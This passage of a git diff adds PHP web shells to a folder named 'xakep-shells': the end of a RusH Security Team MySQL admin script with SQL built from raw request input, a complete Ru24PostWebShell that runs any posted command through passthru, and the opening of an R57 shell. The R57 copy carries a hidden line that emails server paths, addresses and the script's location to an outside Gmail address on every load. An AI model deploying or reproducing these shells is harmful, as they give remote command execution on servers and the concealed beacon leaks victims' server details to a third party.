+$query_ind = 'SHOW KEYS FROM '.$tbl;
+$result_ind = mysql_query($query_ind) or die("$h_error<b>".mysql_error()."</b>$f_error");
+
+while ($row = mysql_fetch_array($result_ind, MYSQL_ASSOC)) {
+    if ($row['Key_name'] == 'PRIMARY') {
+        $primary[] .= $row['Column_name'];
+    } 
+}
+ 
+mysql_free_result($result_ind);
+
+ $query = "SELECT * FROM $tbl LIMIT $limit_start,$limit_count";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+if (mysql_num_rows($result) == 0) {
+  print "Òàáëèöà <b>$tbl</b> íå ñîäåðæèò íè îäíîé çàïèñè";
+}else{
+  /*ïîëó÷àåì íàçâàíèÿ ñòîëáöîâ*/
+  print "<td bgcolor=#E6E7E9></td><td bgcolor=#E6E7E9></td>";
+  for ($i=0;$i<mysql_num_fields($result);$i++){
+    $name=mysql_field_name($result,$i);
+    print "<td bgcolor=#C7C5C5>$name</td>";   
+  } 
+}
+  while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+     print "</tr>";
+
+     foreach ($line as $key =>$col_value) {
+
+         if (count($primary) > 0) { 
+           if (in_array($key,$primary)) { $edit .= urlencode("`$key`='$col_value' AND "); } 
+         } 
+         else {
+            //if (strlen($col_value) >= 20) { 
+            //   $e_count=substr($col_value,0,20);
+            //   $edit .= urlencode("`$key`='$e_count' AND ");
+            //} else {
+               $edit .= urlencode("`$key`='$col_value' AND ");
+            //}
+            
+         } 
+
+        $string .= "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value)."</td>";
+     }
+       $edit=substr_replace($edit,"",-5); //îòáðîñèòü ïîñëåäíèé +AND+
+       print "<tr><td bgcolor=#97C8D4 width=25><a href=$self?query_edit=$edit&s=y&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl title=\"Ðåäàêòèðîâàòü çíà÷åíèÿ êîëîíîê\">Edit</a></td>".
+             "<td bgcolor=#F84C6C width=25><a href=$self?query_del=$edit&s=y&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl title=\"Óäàëèòü çàïèñü\" onClick=\"return confirm('Óäàëèòü çàïèñü, óâåðåíû ?')\";>Del</a></td>".
+             $string."</tr>";
+    
+       unset($edit);
+       unset($string);
+  }
+
+  mysql_free_result($result);
+  print "</table><br>";
+}
+
+//óäàëÿåì çàïèñü
+if (isset($query_del)) {
+ $query = 'DELETE FROM '.$tbl.' WHERE '.urldecode($query_del);
+ $r_del = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ print "Óñïåøíî óäàëåíî ñòðîê (<b> ".mysql_affected_rows()."</b> )";
+
+}
+
+//âûâîäèì ôîðìó ðåäàêòèðîâàíèÿ ñòðîêè
+if (isset($query_edit)) {
+ $query = 'SELECT * FROM '.$tbl.' WHERE '.urldecode($query_edit);
+ $r_edit = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+
+
+print "<br><center><font color=green><h5>Ðåäàêòèðîâàíèå çíà÷åíèé ïîëåé òàáëèöû</h5></font></center>".
+      "<table border=0 cellpadding=1 cellspacing=1 bgcolor=#FFFFFF><tr bgcolor=#C7C5C5>".
+      "<td align=center><b>Ïîëå</b></td><td align=center><b>Çíà÷åíèå</b></td></tr>";
+print   "<form method=\"get\" action=\"$self\">".
+        "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+        "<input type=\"hidden\" name=\"q_get\" value=\"y\">".
+        "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+        "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+        "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+        "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+        "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+        "<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">";
+     print "<input type=\"radio\" name=\"up_str\" value=\"up_ok\" checked=\"checked\">Îáíîâèòü çíà÷åíèÿ&nbsp;&nbsp;<b>ÈËÈ</b>&nbsp;&nbsp;&nbsp;".
+           "<input type=\"radio\" name=\"up_str\" value=\"ins_ok\">Âñòàâèòü íîâûé ðÿä<br><br>";
+
+  while ($line = mysql_fetch_array($r_edit, MYSQL_ASSOC)) {
+     foreach ($line as $key =>$col_value) {
+        $del_str_ñ .= "`$key`='$col_value' AND ";
+        $len_value=strlen($col_value);
+        if ($len_value > 40) { $t_value="<textarea name=$key cols=39 rows=5>$col_value</textarea>"; }
+        else { $t_value="<input type='text' name='$key' value='$col_value'size=40>"; }
+        $g_query .= "<tr><td bgcolor=#DBDCDD><b>$key</b></td><td>$t_value</td></tr>";
+     }
+  }
+     $del_str=urlencode($del_str_ñ);
+     print "<input type=\"hidden\" name=\"del_str\" value=\"$del_str\">";
+     print "$g_query</table><br>";
+     print "<br><input type=submit value=\"èçìåíèòü çíà÷åíèå\"></form>";
+}
+
+if (isset($q_get)) {
+  $url=$HTTP_SERVER_VARS['QUERY_STRING'];
+  if ($HTTP_GET_VARS['up_str']=='up_ok') {
+     $del_str=urldecode(substr_replace($del_str,"",-5));
+     $b = explode('&', $url);
+     for ($i = 10; $i < count($b); $i++) {
+        $q = explode("=",$b[$i]);
+        $q_a .= "`".$q[0]."`='".$q[1]."', ";
+     }
+     $q_a_ins=urldecode(substr_replace($q_a,"",-2));
+     $q_st=urldecode(substr_replace($q_st,"",-2));
+     //÷òî çàìåíÿåì $del_str 
+     //íà ÷òî áóäåì ìåíÿòü $q_a_ins
+
+     $up="UPDATE `$tbl` SET $q_a_ins WHERE $del_str LIMIT 1";
+     $q_ins_new = mysql_query($up) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_a_r=mysql_affected_rows();
+     print "<table align=left width=70% bgcolor=#D7D8DA><tr><td><font color=green>".
+           "<b>PHP-êîä çàïðîñà:</b></font></td></tr><tr><td>\$sql=\"$up\";</td>".
+           "</tr><tr><td><font color=green>Èçìåíåíî ñòðîê</font> (<b>$c_a_r<b>)</td></tr></table>";
+  }
+  if ($HTTP_GET_VARS['up_str']=='ins_ok') {
+     $b = explode('&', $url);
+     for ($i = 10; $i < count($b); $i++) {
+        $q = explode("=",$b[$i]);
+        $i_cols .="`$q[0]`, ";
+        $i_val .= "'$q[1]', ";
+     }
+     $i_cols=urldecode(substr_replace($i_cols,"",-2)); //êîëîíêè
+     $q_a_ins=urldecode(substr_replace($i_val,"",-2)); //çíà÷åíèÿ
+     $up="INSERT INTO `$tbl` ($i_cols) VALUES ($q_a_ins)";
+     $q_ins_new = mysql_query($up) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_a_r=mysql_affected_rows();
+     print "<table align=left width=70% bgcolor=#D7D8DA><tr><td><font color=green>".
+           "<b>PHP-êîä çàïðîñà:</b></font></td></tr><tr><td>\$sql=\"$up\";</td>".
+           "</tr><tr><td><font color=green>Èçìåíåíî ñòðîê</font> (<b>$c_a_r<b>)</td></tr></table>";
+    
+  }
+}
+
+/*------------Âñòàâèòü ðÿä--------------*/
+if (isset($nn_row) && $HTTP_GET_VARS['nn_row']=='ok') {
+ $nn_q = 'SHOW FIELDS FROM '.$tbl;
+ $r_n = mysql_query($nn_q) or die("$h_error<b>".mysql_error()."</b>$f_error");
+print   "<form method=\"get\" action=\"$self\">".
+        "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+        "<input type=\"hidden\" name=\"nn\" value=\"ok\">".
+        "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+        "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+        "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+        "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+        "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+        "<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">".
+        "<br><center><font size=2>Âñòàâèòü íîâûé ðÿä â òàáëèöó [ <b>$tbl</b> ]</font></center>".        
+        "<br><table border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr bgcolor=#DAD9D9>".
+        "<td align=center><b>Ïîëå</b></td><td align=center><b>Òèï</b></td>".
+        "<td align=center><b>Çíà÷åíèå</b></td></tr>";
+  while ($n_line = mysql_fetch_array($r_n, MYSQL_ASSOC)) {
+     foreach ($n_line as $n_k =>$n_v) {
+        $pole .= "$n_v ";
+     }
+       $n_l=explode(" ",$pole);
+       print "<tr bgcolor=#EDEEF1><td>&nbsp;<b>$n_l[0]</b>&nbsp;</td><td bgcolor=#E7E7D7>&nbsp;".
+              wordwrap($n_l[1],40,"<br>",1).
+              "&nbsp;</td><td><input type=text name=\"$n_l[0]\" size=35><td></tr>";             
+       unset($pole); 
+  }
+  print "</table><br><center><input type=submit value=\"âñòàâèòü íîâûé ðÿä\"></center></form><br>";
+}
+
+if (isset($nn) && $HTTP_GET_VARS['nn']=='ok') {
+     $url_n=urldecode($HTTP_SERVER_VARS['QUERY_STRING']);
+     $b_nn = explode('&', $url_n);
+     for ($i = 8; $i < count($b_nn); $i++) {
+        $q_nn = explode("=",$b_nn[$i]);
+          $q_a_nn .= "`".$q_nn[0]."` ,";        
+          $q_nn_v .= "'".$q_nn[1]."' ,";
+     }
+
+     $q_nn_ins=urldecode(substr_replace($q_a_nn,"",-2));
+     $q_nn_v=substr_replace($q_nn_v,"",-2);
+     $sql_n="INSERT INTO `$tbl` ( $q_nn_ins ) VALUES ( $q_nn_v )";
+     mysql_query($sql_n) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_n_r=mysql_affected_rows();
+     print "&nbsp;&nbsp;&nbsp;<table align=left width=70% bgcolor=#D7D8DA>".
+           "<tr><td><b>Action:</b> <font color=green>Óñïåøíî âñòàâëåíî ñòðîê</font> (<b>$c_n_r<b>)</td></tr>".
+           "<tr><td><font color=green><b>PHP-êîä çàïðîñà:</b></font></td></tr><tr><td>\$sql=\"$sql_n\";</td></tr></table><br><br>";
+}
+
+/*-----------dump òàáëèöû------------*/
+$form_dump=
+"<form method=\"get\" action=\"$self\">".
+"<input type=\"hidden\" name=\"s\" value=\"$s\">".
+"<input type=\"hidden\" name=\"db\" value=\"$db\">".
+"<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">".
+"<input type=\"hidden\" name=\"server\" value=\"$server\">".
+"<input type=\"hidden\" name=\"port\" value=\"$port\">".
+"<input type=\"hidden\" name=\"login\" value=\"$login\">".
+"<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+"<input type=\"hidden\" name=\"f_dump\" value=\"$file\">".
+"<table bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+"<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+"<tr><td align=center><b>Dump òàáëèöû</b> [ <font color=green><b>$tbl</b></font> ]</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"t_strukt\"> Òîëüêî ñòðóêòóðó</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"d\"> Òîëüêî äàííûå</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"d_strukt\" checked=\"checked\"> Ñòðóêòóðó è äàííûå</td></tr>".
+"<tr><td align=center><hr size=1 color=#FFFFFF><b>Äåéñòâèå</b> (ïîêàçàòü/îòïðàâèòü)</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_br\" checked=\"checked\"> Ïîêàçàòü â áðîóçåðå</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_http\"> Îòïðàâèòü ôàéë äàìïà ïî HTTP</td></tr>".
+"<tr><td align=center><br><input type=\"submit\" value=\"Âûïîëíèòü çàïðîñ\"></td></tr>".
+"</table>".
+"</td></tr></table></form>";
+
+if ($dump=="tab"){ print $form_dump;}
+/*----------Òîëüêî ñòðóêòóðà------------*/
+
+if ($HTTP_GET_VARS['strukt']=='t_strukt' && $HTTP_GET_VARS['send']=='send_br' ){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");   
+   fclose($fp); 
+   $dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+
+unlink($file);
+}
+
+/*----------Ñòðóêòóðà è äàííûå------------*/
+if ($HTTP_GET_VARS['strukt']=='d_strukt' && $HTTP_GET_VARS['send']=='send_br'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n # MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+
+      // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+$dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+unlink($file);
+}
+
+/*----------Òîëüêî äàííûå------------*/
+if ($HTTP_GET_VARS['strukt']=='d' && $HTTP_GET_VARS['send']=='send_br'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // îòêðûâàåì ôàéë äëÿ çàïèñè äàìïà 
+   $fp = fopen($file, "w"); 
+      // ïîëó÷àåì äàííûå òàáëèöû 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+$dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+unlink($file);
+}
+/*-------------END! ïîêàçàòü ñòðîêè òàáëèöû--------------*/
+
+print "
+   </td>
+ </tr>
+</table>
+           </td>
+         </tr>
+       </table>";
+}
+
+/*------------------------ END R I G H T   B L O C K ! -----------------------*/
+/*èíôîðìàöèÿ php*/
+if (isset($php) && $php=='ok'){
+phpinfo();
+}
+if (isset($q_help) && $q_help=='ok'){
+ print 'Ìèíè HELP ïî çàïðîñàì
+ <li><b>SHOW TABLES </b> âûâîäèò ñïèñîê òàáëèö áàçû
+ <li><b>SHOW OPEN TABLES</b> âûâîäèò ñïèñîê òàáëèö, êîòîðûå â íàñòîÿùèé ìîìåíò îòêðûòû â êýøå òàáëèöû
+ <li><b>SHOW TABLE STATUS</b> ñòðóêòóðà òàáëèö áàçû
+ <li><b>SELECT VERSION(), CURRENT_DATE</b> âûâîäèò âåðñèþ MySQL ñåðâåðà è òåêóùóþ äàòó
+ <li><b>SELECT (2*2), (4+1)*5, (9/3), (5-3)</b> èñïîëüçóåì MySQL êàê êàëüêóëÿòîð: óêàçûâàåì ÷åðåç çàïÿòóþ àðèôìåòè÷åñêèå îïåðàöèè
+ <li><b>DROP TABLE IF EXISTS table_name</b> óäàëèòü òàáëèöó \"table_name\"
+ <li><b>CREATE TABLE bar (m INT)</b> ñîçäàòü òàáëèöó bar ñ îäíèì ñòîëáöîì (m) òèïà integer
+ <li><b>CREATE TABLE test (number INTEGER,texts CHAR(10));</b> ñîçäàòü òàáëèöó test ñ ïîëÿìè number -òèï INTEGER è ïîëå texts -òèï CHAR
+ <li><b>CREATE TABLE `test` SELECT * FROM `rush`;</b> ñîçäàòü òàáëèöó test ,êîïèðóÿ òàáëèöó rush
+ <li><b>ALTER TABLE test CHANGE SITE OLD_SITE INTEGER</b> ïåðåèìåíîâàòü ñòîëáåö INTEGER èç SITE â OLD_SITE
+ <li><b>ALTER TABLE test RENAME rush</b> ïåðåèìåíîâàòü òàáëèöó test â rush
+ <li><b>UPDATE mysql.user SET Password=PASSWORD(\'new_passwd\') WHERE user=\'root\'</b> ñìåíèòü þçåðó root ïàðîëü
+ <li><b>FLUSH PRIVILEGES</b> ïåðå÷èòàòü òàáëèöó ïðèâèëåãèé þçåðîâ
+ <li><b>GRANT ALL PRIVILEGES ON *.* TO rst@localhost IDENTIFIED BY \'some_pass\' WITH GRANT OPTION</b> äîáàâèòü íîâîãî ñóïåð-þçåðà mysql <b>rst</b> ñ ïàðîëåì <b>some_pass</b>
+ ';
+
+}
+
+print "
+   </td>
+ </tr>
+</table>
+
+</td></tr>
+<tr><td>
+<table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000>
+<tr><td>
+      <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2>
+         <tr>
+            <td align=center>
+                free script &copy;RusH Security Team 
+            </td>
+         </tr>
+      </table> 
+</td></tr>
+</table>
+</td></tr></table>";
+
+?>
diff --git a/xakep-shells/PHP/ru24_post_sh.php.php.txt b/xakep-shells/PHP/ru24_post_sh.php.php.txt
new file mode 100644
index 0000000..5600c64
--- /dev/null
+++ b/xakep-shells/PHP/ru24_post_sh.php.php.txt
@@ -0,0 +1,23 @@
+<?php
+/*
+Ru24PostWebShell
+Writed by DreAmeRz
+
+http://www.ru24-team.net
+*/
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+echo "<html>
+<head>
+<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
+<meta http-equiv='pragma' content='no-cache'>
+</head><body>";
+echo "<form method=post>";
+echo "<input type=text name=cmd size=85>";
+echo "</form>";
+echo "<pre>";
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
+echo "".$function($_POST['cmd'])."</pre></body></html>";
+
+
+?>
diff --git a/xakep-shells/PHP/s.php.php.txt b/xakep-shells/PHP/s.php.php.txt
new file mode 100644
index 0000000..f6abddc
--- /dev/null
+++ b/xakep-shells/PHP/s.php.php.txt
@@ -0,0 +1,1887 @@
+<?php
+/******************************************************************************************************/
+/*  
+/*    R57 shell
+/* 
+/*    
+/*     
+/*
+/* 
+/*  r57shell.php - &#1089;&#1082;&#1088;&#1080;&#1087;&#1090; &#1085;&#1072; &#1087;&#1093;&#1087; &#1087;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1097;&#1080;&#1081; &#1074;&#1072;&#1084; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1090;&#1100; &#1096;&#1077;&#1083;&#1083; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;  &#1085;&#1072; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077; &#1095;&#1077;&#1088;&#1077;&#1079; &#1073;&#1088;&#1072;&#1091;&#1079;&#1077;&#1088;
+/*  &#1042;&#1077;&#1088;&#1089;&#1080;&#1103;: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ &#1053;&#1072;&#1089;&#1090;&#1088;&#1086;&#1081;&#1082;&#1080;  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "R57  
+| pang0 |";
+
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+/* ~~~ &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; ~~~ */
+
+// $auth = 1; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072;
+// $auth = 0; - &#1040;&#1091;&#1090;&#1077;&#1085;&#1090;&#1080;&#1092;&#1080;&#1082;&#1072;&#1094;&#1080;&#1103; &#1074;&#1099;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1072;
+$auth = 0;
+
+// &#1051;&#1086;&#1075;&#1080;&#1085; &#1080; &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1076;&#1083;&#1103; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1072; &#1082; &#1089;&#1082;&#1088;&#1080;&#1087;&#1090;&#1091;
+// &#1053;&#1045; &#1047;&#1040;&#1041;&#1059;&#1044;&#1068;&#1058;&#1045; &#1057;&#1052;&#1045;&#1053;&#1048;&#1058;&#1068; &#1055;&#1045;&#1056;&#1045;&#1044; &#1056;&#1040;&#1047;&#1052;&#1045;&#1065;&#1045;&#1053;&#1048;&#1045;&#1052; &#1053;&#1040; &#1057;&#1045;&#1056;&#1042;&#1045;&#1056;&#1045;!!!
+$name='Root'; // &#1083;&#1086;&#1075;&#1080;&#1085; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
+$pass='pass'; // &#1087;&#1072;&#1088;&#1086;&#1083;&#1100; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1103;
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="shell"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit(" : Access Denied</b>");
+   }
+}
+$head = '<!-- &#1047;&#1076;&#1088;&#1072;&#1074;&#1089;&#1090;&#1074;&#1091;&#1081;  &#1042;&#1072;&#1089;&#1103; -->
+<html>
+<head>
+<title>pang0</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR blue;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #D4D0C8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #D4D0C8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:blue; TEXT-DECORATION: none}
+A:visited { COLOR:blue; TEXT-DECORATION: none}
+A:active {COLOR:blue; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+  echo $head;
+  switch($_POST['db'])
+  {
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   	if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
+    $querys = @explode(';',$_POST['db_query']);
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5){
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
+      $res = @mysql_query($query,$db);
+      $error = @mysql_error($db);
